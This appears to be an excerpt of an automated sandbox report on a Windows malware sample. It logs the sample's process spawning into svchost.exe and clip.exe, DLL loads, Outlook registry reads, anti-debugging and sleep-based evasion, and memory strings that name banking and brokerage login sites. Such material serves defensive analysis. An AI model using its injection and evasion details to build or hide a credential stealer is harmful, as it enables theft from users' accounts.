            Source: unknown | Process created: C:\Users\user\Desktop\TOgpmvvWoj.exe "C:\Users\user\Desktop\TOgpmvvWoj.exe"
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TOgpmvvWoj.exe"
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TOgpmvvWoj.exe"
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\clip.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: TOgpmvvWoj.exe | Static file information: File size 1180160 > 1048576
            Source: TOgpmvvWoj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: TOgpmvvWoj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: TOgpmvvWoj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: TOgpmvvWoj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: TOgpmvvWoj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: TOgpmvvWoj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: TOgpmvvWoj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000000.1411571684.000000000030E000.00000002.00000001.01000000.00000005.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000000.1556057454.000000000030E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: TOgpmvvWoj.exe, 00000004.00000003.1301147279.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, TOgpmvvWoj.exe, 00000004.00000003.1298508688.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485647293.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485647293.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1396440551.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1398141581.0000000003200000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3763569921.00000000049A0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3763569921.0000000004B3E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1484930871.0000000004630000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1488364602.00000000047EB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: TOgpmvvWoj.exe, 00000004.00000003.1301147279.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, TOgpmvvWoj.exe, 00000004.00000003.1298508688.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.1485647293.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485647293.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1396440551.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1398141581.0000000003200000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000009.00000002.3763569921.00000000049A0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3763569921.0000000004B3E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1484930871.0000000004630000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1488364602.00000000047EB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000006.00000003.1453476434.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485400848.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762132057.0000000001268000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000009.00000002.3758257175.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3768118603.0000000004FCC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039A3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000009.00000002.3758257175.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3768118603.0000000004FCC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039A3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000006.00000003.1453476434.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485400848.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762132057.0000000001268000.00000004.00000020.00020000.00000000.sdmp
            Source: TOgpmvvWoj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: TOgpmvvWoj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: TOgpmvvWoj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: TOgpmvvWoj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: TOgpmvvWoj.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E8C304 LoadLibraryA,GetProcAddress, 4_2_00E8C304
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E38B85 push ecx; ret 4_2_00E38B98
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004031C0 push eax; ret 6_2_004031C2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004161D3 push ecx; ret 6_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004162CC push ecx; ret 6_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00417356 push ebx; retf 6_2_00417359
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00416338 push ecx; ret 6_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004083DA push es; ret 6_2_004083DE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0040BBEC pushad ; iretd 6_2_0040BBEE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00418577 push 2823B84Bh; retf 6_2_00418587
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00417D38 push ecx; iretd 6_2_00417D39
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf 6_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00411E39 push esp; ret 6_2_00411E41
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf 6_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0340225F pushad ; ret 6_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034027FA pushad ; ret 6_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034309AD push ecx; mov dword ptr [esp], ecx 6_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0340283D push eax; iretd 6_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0340135E push eax; iretd 6_2_03401369
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Code function: 8_2_032A7395 push ebx; retf 8_2_032A7398
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Code function: 8_2_032AEA1C push edx; ret 8_2_032AEA38
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Code function: 8_2_032ADF64 push FFFFFFB8h; retf 8_2_032ADF66
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Code function: 8_2_032A1E78 push esp; ret 8_2_032A1E80
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Code function: 8_2_032B2E4B push ecx; iretd 8_2_032B2E4C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Code function: 8_2_032ADEE3 push edi; ret 8_2_032ADEE4
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Code function: 8_2_032A7D77 push ecx; iretd 8_2_032A7D78
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Code function: 8_2_032A85B6 push 2823B84Bh; retf 8_2_032A85C6
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Code function: 8_2_0329BC2B pushad ; iretd 8_2_0329BC2D
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | Code function: 8_2_03298419 push es; ret 8_2_0329841D
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 9_2_049D09AD push ecx; mov dword ptr [esp], ecx 9_2_049D09B6
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 9_2_02A303DB push ecx; retf 9_2_02A303DC
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 9_2_02A24193 push ebx; retf 9_2_02A24196
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E14A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 4_2_00E14A35
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E955FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 4_2_00E955FD
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E333C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_00E333C7
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeAPI/Special instruction interceptor: Address: D43204
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0347096E rdtsc 6_2_0347096E
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 774Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 9198Jump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_4-98947
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 7432Thread sleep count: 774 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 7432Thread sleep time: -1548000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 7432Thread sleep count: 9198 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 7432Thread sleep time: -18396000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe TID: 7456Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe TID: 7456Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe TID: 7456Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe TID: 7456Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E74696 GetFileAttributesW,FindFirstFileW,FindClose,4_2_00E74696
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,4_2_00E7C9C7
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7C93C FindFirstFileW,FindClose,4_2_00E7C93C
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00E7F200
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00E7F35D
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_00E7F65E
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E73A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_00E73A2B
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E73D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_00E73D4E
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_00E7BF27
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A2BC20 FindFirstFileW,FindNextFileW,FindClose,9_2_02A2BC20
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E14AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_00E14AFE
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - HKVMware20,11696492231]
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696492231|
            Source: 23802I71.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 23802I71.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 23802I71.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 23802I71.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 23802I71.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,
            Source: 23802I71.9.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM.HKVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - GDCDYNVMware20,116
            Source: 23802I71.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696492231x
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,1169649223
            Source: 23802I71.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 23802I71.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 23802I71.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: firefox.exe, 0000000D.00000002.1775937404.0000023E799AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII|/P
            Source: 23802I71.9.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: 23802I71.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,1Od
            Source: 23802I71.9.dr Binary or memory string: discord.comVMware20,11696492231f
            Source: clip.exe, 00000009.00000002.3758257175.0000000002A76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sswords blocklistVMware20,11696492231
            Source: 23802I71.9.dr Binary or memory string: global block list test formVMware20,11696492231
            Source: 23802I71.9.dr Binary or memory string: dev.azure.comVMware20,11696492231j
            Source: 23802I71.9.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ivebrokers.comVMware20,11696492231
            Source: 23802I71.9.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 23802I71.9.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 23802I71.9.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20wd
            Source: clip.exe, 00000009.00000002.3771571702.0000000007D34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nara Change Transaction PasswordVMware20?d
            Source: 23802I71.9.dr Binary or memory string: tasks.office.comVMware20,11696492231o
            Source: ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3762297447.000000000100F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
            Source: 23802I71.9.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: 23802I71.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: 23802I71.9.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 23802I71.9.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: 23802I71.9.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 23802I71.9.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 23802I71.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 23802I71.9.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe API call chain: ExitProcess graph end node graph_4-97910
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\clip.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0347096E rdtsc 6_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_004173E3 LdrLoadDll, 6_2_004173E3
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe Code function: 4_2_00E841FD BlockInput, 4_2_00E841FD
